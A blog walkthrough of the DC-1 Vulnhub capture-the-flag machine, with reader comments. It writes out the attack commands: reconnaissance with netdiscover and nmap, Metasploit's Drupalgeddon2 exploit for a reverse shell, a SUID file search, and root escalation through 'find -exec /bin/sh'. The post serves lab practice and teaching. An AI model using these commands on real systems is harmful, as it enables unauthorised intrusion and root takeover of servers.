Subscribe to Blog via Email

Categories

Archives

CTF Challenges

DC-1: Vulnhub Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTPS service port (80)
  • Finding Drupal CMS
  • Exploiting Drupalgeddon2 to get a reverse shell
  • Finding files with SUID bit set
  • Finding the “find” command with SUID bit set
  • Getting root shell with “find” command
  • Getting final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

nmap -sV 192.168.1.104

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)

We find that port 80 is running http, so we open the IP in our browser.

When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and successfully able to get a reverse shell.

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.

python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

As “find” command has SUID bit set, we can execute the command as “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.  

After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell as root user. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.

touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

4 thoughts on “DC-1: Vulnhub Walkthrough

  1. Hi Raj,

    nice walktrhough, but few questions:
    1. would you also be able to get the same shell without using metasploit?

    2. I didn’t really get the last part of the walkthrough.
    What exactly does “find / -perm -u=s -type f 2>/dev/null” do? and how do you find a SUID bit set?
    Also I didn’t really understand the thing with find. How can you execute commands over find or why don’t you just run the commands directly?
    Okay, then you spawn a shell as rot with /bin/bash, the rest is clear, but yeah, it would be nice if you could help me out understanding it! 🙂

    1. bro , he is checing suid bit set files using this command

      find / -perm -u=s -type f 2>/dev/null

      and he noticed find is having suid permissions

      so he can run it with high privileges

  2. There is flag3 in Drupal Website. After spawning the shell, we can use Drush command to reset password of “admin” and read it. Thank Raj, you are amazing.

Leave a Reply

Your email address will not be published. Required fields are marked *